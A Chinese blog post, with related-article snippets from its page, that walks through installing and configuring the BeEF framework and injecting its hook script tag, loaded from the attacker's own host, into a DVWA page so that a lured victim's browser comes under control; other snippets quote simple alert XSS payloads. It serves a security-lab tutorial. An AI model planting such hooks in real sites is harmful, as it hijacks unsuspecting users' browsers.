xss漏洞进阶

最新推荐文章于 2023-02-02 12:47:00 发布
最新推荐文章于 2023-02-02 12:47:00 发布
阅读量172 收藏
点赞数
分类专栏: 漏洞 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_50887021/article/details/118253397
版权

xss

xss漏洞利用

1.安装beef

apt-get update
apt-get install bee-xss

2.配置密码
/etc/beef-xss/config.yaml
默认用户名为beef
默认密码为beef
修改密码为123456
注意密码要用引号引起来
3.启动服务
beef-xss
可以看到生成的链接

 Web UI: http://127.0.0.1:3000/ui/panel
 Hook: <script src="http://<IP>:3000/hook.js"></script>
 Example: <script src="http://127.0.0.1:3000/hook.js"></script>

4.登录beef控制平台

在这里插入图片描述5.将代码插入到目标URL,欺骗被攻击者访问

name:hello

message:qqq

在这里插入图片描述

在这里插入图片描述
6.打开windows10上面的dvwa,在beef上面看到Windows10上线
攻击成功

blank er
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
跨站脚本攻击(XSS)进阶
悦分享
07-08 315
跨站脚本攻击(XSS)是客户端脚本安全中的头号大敌。OWASP TOP 10威胁多次把XSS列在榜首。跨站脚本攻击,英文全称是 Cross Site Script,本来缩写是 CS S,但是为了和层叠样式表(Cascading Style Sheet,CSS)有所区别,所以在安全领域叫做“XSS”。XSS攻击,通常指黑客通过“HTML注入”篡改了网页,插入了恶意的脚本,从而在用户浏览网页时,控制用户浏览器的一种攻击。在一开始,这种攻击的演示案例是跨域的,所以叫做“跨站脚本”。
XSS漏洞-01】XSS漏洞简介、危害与分类及验证
最新发布
zz12345600354的博客
04-23 1014
定义/原理:跨站脚本(Cross-Site Scripting),本应该缩写为CSS,但是该缩写已被层叠样式脚本Cascading Style Sheets所用,所以改简称为XSS。也称跨站脚本或跨站脚本攻击。跨站脚本攻击XSS通过将恶意得Script代码注入到Web页面中,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。本质:是一种针对网站应用程序的安全漏洞攻击技术,是代码注入的一种。特点:XSS主要基于JavaScript。
XSS入门到进阶
似水流年
11-01 1027
XSS入门到进阶 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-6tcYY5nE-1604207447472)(https://raw.githubusercontent.com/Harveysn0w/MAC_note-img/main/640.jpeg)] XSS简介 XSS分类 XSS实战 XSS Fuzzing XSS WAF Bypass思路 XSS工具 XSS修复 xss简介 OWASP TOP 10 OWASP(开放式Web应用程序安全项目)的工具、文档、论坛
XSS进阶
giantbranch的专栏
09-05 2534
实验来源:合天网安实验室
XSS进阶
goddemon
03-10 1900
前置知识点: ①javascript基础知识 javascript参考文档 自我理解的javascript 基础的javascript语法 html dom理解 属性 从基础的语法也可以思考到我们能够利用js进行做的一些事情了 只要具有内容 我们就可以调用js接口去获取很多东西 甚至于如果浏览器的沙箱出问题了 或者是electron的东西 调用本地资源造成rce漏洞 如 蜜罐去获取history 给我的理解就是访问一个网站后网站里面的js调用的web api去获取历史内容发送到指定的网站上去进而进
XSS进阶
giantbranch的专栏
09-05 2433
实验来源:合天网安实验室
XSS进阶小教程
18年3月萌新白帽子
02-25 4026
一、在了解XSS之前,我们首先需要先了解一下HTML 与 JavaScript 自解码机制。 1、HTML的自解码机制 浏览器在解析HTML标签属性值内的代码前,会先对下列两种编码进行解码,然后再对属性中的代码进行解析。 (1)、进制解码:&#xH;(十六进制格式)、&#D;(十进制格式)。编码中最后的分号(;)可以不要。且16进制中用来表示10~15的a~f对大...
xss漏洞
Cracker's Blog
03-18 175
0x00 前言 xss漏洞是往web站点恶意插入JS代码,由web的后端语言 将JS代码输出并在浏览器运行,达到恶意攻击用户的目的。利用方式多种多样,是非常危险的漏洞。 DOM :一种操作可扩展标记语言(如HTML、XML等)的javascriptAPI 文档(document):一个页面就是一个文档 元素(element):页面中的使用标签 节点(node):页面中的所有内容都是节点(标签...
XSS漏洞
zjdda的博客
05-30 431
简单介绍XSS漏洞的原理、分类、危害以及防御
XSS攻击进阶篇.zip
09-27
**XSS(跨站脚本)攻击是一种常见的网络安全威胁,主要针对Web应用程序。...了解其原理和防御措施是网络安全中的重要一环,对于开发者和安全研究人员来说,持续学习和掌握XSS攻击的进阶知识至关重要。**
xss漏洞讲解.pdf
04-22
XSS漏洞,全称为跨站脚本攻击(Cross-Site Scripting),是一种常见的网络安全漏洞。它允许攻击者将恶意脚本代码注入到正常的网页之中,当其他用户浏览这些网页时,嵌入在其中的恶意脚本就会执行,从而达到攻击者的...
xss漏洞靶场一到十关
weixin_52029251的博客
03-09 724
第一关: 先找注入点,但是页面没有注入的地方,之后查看元素,发现网址后的name可以修改,找到注入点后,将注入代码<script>alert(/xss/)</script>输入,即可完成。 第二关 页面有一个搜索框可以进行代码注入,查看元素框,发现搜索后发现<input name="keyword" value=>后可以进行代码注入,之后将前面的代码进行闭合 之后输入注入代码<script>alert(/xxs/)</script&..
Web安全系列(三):XSS 攻击进阶(挖掘漏洞
weixin_33950035的博客
09-18 425
前言 在前些章节 (web安全系列(一):XSS 攻击基础及原理)以及(Web安全系列(二):XSS 攻击进阶(初探 XSS Payload))中,我详细介绍了 XSS 形成的原理以及 XSS 攻击的分类,并且编写了一个小栗子来展示出 XSS Payload 的危害。 目前来说,XSS漏洞类型主要分为三类:反射型、存储型、DOM型,在本篇文章当中会以permeate生态测试系统为例,分析网站功...
《白帽子讲web安全》第3章 跨站脚本攻击(XSS
询昵的博客
05-27 304
一、XSS简介 跨站脚本攻击(Cross Site Script):本来缩写是CSS,为了和层叠样式表示(Cascading Style Sheet,CSS)有所区别,所以在安全领域叫做“XSS”。通常指黑客通过“HTML注入”篡改了网页,插入了恶意的脚本,从而在用户浏览网页时,控制用户浏览器的一种攻击。 ①反射型XSS:简单地把用户输入的数据“反射”给浏览器。黑客往往需要诱使用户“点击”一个恶意链接,才能攻击成功。也叫做“非持久型 XSS(Non-persistent XSS)” ②存储型XSS..
XSS基础与进阶
知足且坚定,温柔且上进
03-12 437
XSS漏洞介绍: 跨站脚本(Cross-Site Scripting,简称XSS或跨站脚本或跨站脚本攻击)是一种针对网站应用程序的安全漏洞攻击技术,是代码注入的一种。它允许恶意用户将代码注入网页,其他用户在浏览网页时就会收到影响。恶意用户利用XSS代码攻击成功后,可能得到很高的权限(如执行一些操作)、私密网页内容、会话和cookie等各种内容。 XSS攻击可以分为三种:反射型、存储型和DOM型。 ...
bee-box之XSS攻击(附上篇总结)
qq_43571759的博客
03-20 3459
bwapp的xss练习笔记附上篇总结 前言 一个月前刷了XSSchalleng以为自己已经算是入门了XSS了,但是在我挖洞碰到有可能存在XSS漏洞网页的时候,发现我只能记起来<script>alert('xss')</script> 等等最基本的,绕过方式忘得一干二净,果然一句话说得好!对于我这种没有天赋的人,重复就是记忆它妈!!! 再就是上次刷题的我居然没有总结,那可是我...
XSS 进阶篇:一文全面了解蓝莲花基本用法
weixin_43263566的博客
02-02 4965
XSS - 进阶篇(蓝莲花的基本使用)
XSS漏洞深度剖析与实战指南
"这篇文档详细介绍了XSS(跨站脚本攻击)的各种情况和攻防策略,涵盖了从基础到进阶的各种场景,包括反射型XSS、DOM型XSS和存储型XSS,并探讨了XSS过滤器的绕过方法。" 在网络安全中,XSS(Cross Site Scripting)...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值